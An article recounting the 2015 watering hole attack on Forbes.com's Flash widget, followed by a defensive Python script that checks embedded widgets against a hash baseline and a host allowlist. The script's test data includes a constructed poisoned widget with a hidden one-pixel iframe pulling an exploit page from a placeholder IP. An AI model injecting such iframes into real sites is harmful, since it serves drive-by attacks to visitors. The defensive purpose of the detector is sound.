Watering hole attacks were in the news earlier this year (2015) after a Chinese cyber espionage group used one to compromise visitors from several major US financial services and defense industry companies. The attack sprang from malicious code injected into www.forbes.com’s ‘Thought of the Day’ widget, the Flash pop-up that users see when they visit the Forbes.com home page.
The group chained two zero-day vulnerabilities: one in Adobe’s Flash Player, which gave them code execution in the visitor’s browser, and one in Microsoft’s Internet Explorer, which they used to defeat the browser’s memory-protection (ASLR). Both have since been fixed by Adobe and Microsoft.
The forbes.com example is a classic ‘watering hole’ drive-by attack. The premise is simple: identify a place, online or in the real world, where members of a target community gather, and then poison that place. Once it is poisoned, every visitor is quietly served the attackers’ code, and any visitor whose browser or plugins are vulnerable is infected without clicking on or downloading anything.
In the physical world, a watering hole attack might be something like setting up a rogue, free Wi-Fi hotspot at a coffee shop where employees of a target company often go.
In the Forbes attack, the watering hole was Forbes’s Flash ‘Thought of the Day’ widget, which many people in the financial services and defense industries see simply because they visit www.forbes.com so often.
Simple, classic and dangerous.
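The defender’s side of the same premise, as an added example that is not part of the original article or anything Forbes actually ran: a watering hole works because visitors load content the site operator never intended to serve, so the cheapest check for a site that embeds third-party widgets is to record what each widget normally looks like and alert when it changes or starts pulling content from hosts you never approved. The allowlisted hosts and both widget bodies below are constructed sample data.

```python
"""Baseline-and-diff check for an embedded widget served from your own site.

Added example, not code from the original article or from Forbes. It records a
hash of the widget as it should be, then flags any later copy that differs or
that references hosts outside a small allowlist. The widget bodies and hosts
used here are constructed for illustration.
"""
import hashlib
import re
from urllib.parse import urlparse

# Hosts an embedded widget is allowed to load from (hypothetical allowlist).
ALLOWED_HOSTS = {"www.example-publisher.com", "cdn.example-publisher.com"}

# Attribute values that make the browser fetch something: the URL a drive-by
# payload has to smuggle in somewhere.
URL_RE = re.compile(r"""(?:src|data|href)\s*=\s*["']?(https?://[^"'\s>]+)""",
                    re.IGNORECASE)


def sha256_hex(body: str) -> str:
    """Hex SHA-256 of a widget body; this is the stored baseline."""
    return hashlib.sha256(body.encode("utf-8")).hexdigest()


def referenced_hosts(body: str) -> set:
    """Every external host the widget body would make the browser contact."""
    hosts = set()
    for url in URL_RE.findall(body):
        host = urlparse(url).hostname
        if host:
            hosts.add(host)
    return hosts


def check_widget(body: str, baseline_hash: str, allowed_hosts=ALLOWED_HOSTS) -> list:
    """Compare a freshly fetched widget body against its recorded baseline.

    Returns a list of findings; an empty list means the body is byte-identical
    to the baseline and references only approved hosts. The hash check catches
    any modification at all; the host check tells you where the injected
    content points even if you have no baseline yet.
    """
    findings = []
    if sha256_hex(body) != baseline_hash:
        findings.append("content hash differs from baseline")
    for host in sorted(referenced_hosts(body) - set(allowed_hosts)):
        findings.append(f"references unapproved host: {host}")
    return findings


# Constructed sample: the widget as the site operator intended it.
CLEAN_WIDGET = (
    '<div id="thought-of-the-day">'
    '<object data="https://cdn.example-publisher.com/totd.swf" '
    'type="application/x-shockwave-flash"></object>'
    "</div>"
)
CLEAN_BASELINE = sha256_hex(CLEAN_WIDGET)

# Constructed sample: the same widget with a hidden iframe appended, pulling
# the exploit page from an address (TEST-NET-3, documentation range) that is
# not on the allowlist.
POISONED_WIDGET = CLEAN_WIDGET.replace(
    "</div>",
    '<iframe src="https://203.0.113.7/load.html" width="1" height="1"></iframe></div>',
)


if __name__ == "__main__":
    for name, body in (("clean", CLEAN_WIDGET), ("poisoned", POISONED_WIDGET)):
        findings = check_widget(body, CLEAN_BASELINE)
        print(f"{name}: {'OK' if not findings else '; '.join(findings)}")
```

Run the check from a host outside the site’s own network and on a schedule, because a compromised widget may be served only to some visitors or only for a few days; the Forbes injection was live for a short window, and a check that fires once at deploy time would have missed it.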